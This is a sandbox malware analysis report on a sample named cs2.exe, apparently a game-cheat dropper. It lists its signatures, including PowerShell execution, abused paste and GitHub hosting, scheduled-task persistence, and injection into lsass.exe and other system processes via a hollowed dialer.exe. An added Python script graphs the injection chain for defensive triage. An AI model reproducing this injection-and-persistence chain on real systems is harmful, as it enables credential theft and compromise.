Malware Analysis Report

2025-04-14 04:16

Sample ID 240609-jel93sff6z
Target cs2.exe
SHA256 4a43e95020312d2bc4725f469e6ba1fa66d164842584b916f24606350ab728f6
Tags
execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a43e95020312d2bc4725f469e6ba1fa66d164842584b916f24606350ab728f6

Threat Level: Known bad

The file cs2.exe was found to be: Known bad.

Malicious Activity Summary

execution

Suspicious use of NtCreateUserProcessOtherParentProcess

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-09 07:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-09 07:34

Reported

2024-06-09 07:37

Platform

win10-20240404-en

Max time kernel

32s

Max time network

41s

Command Line

winlogon.exe

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC c:\windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2948 set thread context of 3456 N/A C:\Users\Admin\AppData\Local\conhost32.exe C:\Windows\System32\dialer.exe
PID 3156 set thread context of 4900 N/A C:\Users\Admin\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4236 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\conhost32.exe
PID 4236 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\conhost32.exe
PID 4236 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe
PID 4236 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe
PID 2948 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\conhost32.exe C:\Windows\System32\dialer.exe
PID 3456 wrote to memory of 584 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\winlogon.exe
PID 3456 wrote to memory of 640 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\lsass.exe
PID 3456 wrote to memory of 736 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 908 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1008 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\dwm.exe
PID 3456 wrote to memory of 440 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 380 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 592 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1092 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1104 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1204 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1224 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1240 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1248 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1408 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1432 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1456 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1512 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1560 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1608 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1640 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\svchost.exe
PID 3456 wrote to memory of 1756 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\svchost.exe
PID 3456 wrote to memory of 1764 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 3456 wrote to memory of 1776 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1816 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1876 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2012 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 3456 wrote to memory of 1900 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2168 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2272 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2504 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2512 N/A C:\Windows\System32\dialer.exe c:\windows\system32\sihost.exe
PID 3456 wrote to memory of 2620 N/A C:\Windows\System32\dialer.exe c:\windows\system32\taskhostw.exe
PID 3456 wrote to memory of 2640 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2652 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2660 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2708 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2780 N/A C:\Windows\System32\dialer.exe C:\Windows\sysmon.exe
PID 3456 wrote to memory of 2788 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2836 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2884 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 3092 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 3112 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\wbem\unsecapp.exe
PID 3456 wrote to memory of 3396 N/A C:\Windows\System32\dialer.exe C:\Windows\Explorer.EXE
PID 3456 wrote to memory of 3944 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\RuntimeBroker.exe
PID 3456 wrote to memory of 3796 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\DllHost.exe
PID 3456 wrote to memory of 4964 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1004 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 4296 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 3456 wrote to memory of 3596 N/A C:\Windows\System32\dialer.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
PID 3456 wrote to memory of 2100 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1352 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\DllHost.exe
PID 3456 wrote to memory of 3892 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\ApplicationFrameHost.exe
PID 3456 wrote to memory of 436 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\InstallAgent.exe
PID 3456 wrote to memory of 4040 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\DllHost.exe
PID 3456 wrote to memory of 2948 N/A C:\Windows\System32\dialer.exe C:\Users\Admin\AppData\Local\conhost32.exe
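
The WriteProcessMemory rows above and the SetThreadContext rows earlier in this section describe one chain: cs2.exe writes into powershell.exe, conhost32.exe and cs2-external-esp.exe; conhost32.exe both writes into and re-points a thread in dialer.exe; dialer.exe then writes into winlogon.exe, lsass.exe, dwm.exe, every svchost.exe, Explorer.EXE and even the sandbox's own sysmon.exe. The script below is an added example, not part of the sandbox output, that turns those rows into a graph. A representative subset of the rows is embedded, copied from the tables above with the sandbox's repeated rows collapsed. It assumes the source-process column never contains a space, which holds for every row in this report, and treats a source/target pair that shows both a memory write and a thread-context change as a hollowing candidate (the CreateProcess-suspended, WriteProcessMemory, SetThreadContext, ResumeThread sequence).

```python
import re
from collections import defaultdict
from typing import NamedTuple

# Subset of the report's rows, copied verbatim from the two signature tables.
ROWS = r"""
PID 4236 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\conhost32.exe
PID 4236 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe
PID 2948 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\conhost32.exe C:\Windows\System32\dialer.exe
PID 3456 wrote to memory of 584 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\winlogon.exe
PID 3456 wrote to memory of 640 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\lsass.exe
PID 3456 wrote to memory of 736 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1008 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\dwm.exe
PID 3456 wrote to memory of 2012 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 3456 wrote to memory of 2780 N/A C:\Windows\System32\dialer.exe C:\Windows\sysmon.exe
PID 3456 wrote to memory of 3396 N/A C:\Windows\System32\dialer.exe C:\Windows\Explorer.EXE
PID 3456 wrote to memory of 3596 N/A C:\Windows\System32\dialer.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
PID 3456 wrote to memory of 2948 N/A C:\Windows\System32\dialer.exe C:\Users\Admin\AppData\Local\conhost32.exe
PID 2948 set thread context of 3456 N/A C:\Users\Admin\AppData\Local\conhost32.exe C:\Windows\System32\dialer.exe
PID 3156 set thread context of 4900 N/A C:\Users\Admin\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe
"""

# Source path is taken as one token (no spaces in any source here); the target keeps the rest.
ROW = re.compile(r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (\S+) (.+)$")
OPS = {"wrote to memory of": "write", "set thread context of": "setctx"}


class Event(NamedTuple):
    op: str
    src_pid: int
    src_image: str
    dst_pid: int
    dst_image: str


def parse_rows(text: str) -> list[Event]:
    """Parse the flattened table; the sandbox emits one row per API call, so drop exact repeats."""
    events, seen = [], set()
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        ev = Event(OPS[m.group(2)], int(m.group(1)), m.group(4), int(m.group(3)), m.group(5))
        if ev not in seen:
            seen.add(ev)
            events.append(ev)
    return events


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def targets_of(events: list[Event], pid: int) -> list[str]:
    """Distinct image names a PID wrote into or re-pointed a thread in."""
    return sorted({basename(e.dst_image) for e in events if e.src_pid == pid})


def hollowing_candidates(events: list[Event]) -> list[tuple[int, int]]:
    """(src, dst) pairs seen with both a memory write and a thread-context change."""
    writes = {(e.src_pid, e.dst_pid) for e in events if e.op == "write"}
    ctx = {(e.src_pid, e.dst_pid) for e in events if e.op == "setctx"}
    return sorted(writes & ctx)


def chain_from(events: list[Event], root_pid: int) -> list[tuple[int, int, str]]:
    """Depth-first walk of write edges from a root PID: (depth, pid, image) in visit order."""
    edges, images = defaultdict(list), {}
    for e in events:
        if e.op == "write":
            edges[e.src_pid].append(e.dst_pid)
        images.setdefault(e.src_pid, e.src_image)
        images.setdefault(e.dst_pid, e.dst_image)
    out, seen = [], set()

    def walk(pid: int, depth: int) -> None:
        if pid in seen:          # dialer.exe writes back into conhost32.exe; break the cycle
            return
        seen.add(pid)
        out.append((depth, pid, basename(images[pid])))
        for child in edges[pid]:
            walk(child, depth + 1)

    walk(root_pid, 0)
    return out


EVENTS = parse_rows(ROWS)

if __name__ == "__main__":
    for depth, pid, image in chain_from(EVENTS, 4236):
        print("  " * depth + f"{image} ({pid})")
    print("hollowing candidates:", hollowing_candidates(EVENTS))
    print("dialer.exe targets:", targets_of(EVENTS, 3456))
```

Two things the graph makes obvious that the flat rows hide: only the conhost32.exe to dialer.exe edge shows the full write-plus-thread-context pair, so dialer.exe (a signed Windows binary) is the hollowed host, and the hollowed dialer.exe is the process that reaches lsass.exe, winlogon.exe and sysmon.exe, which is why its PID, not cs2.exe's, is the one to pivot on in endpoint telemetry. The updater.exe row (PID 3156) has a SetThreadContext but no write row in this report, so it is listed as a target but not as a hollowing candidate.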

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s NlaSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s StateRepository

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s netprofm

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc

c:\windows\system32\sihost.exe

sihost.exe

c:\windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

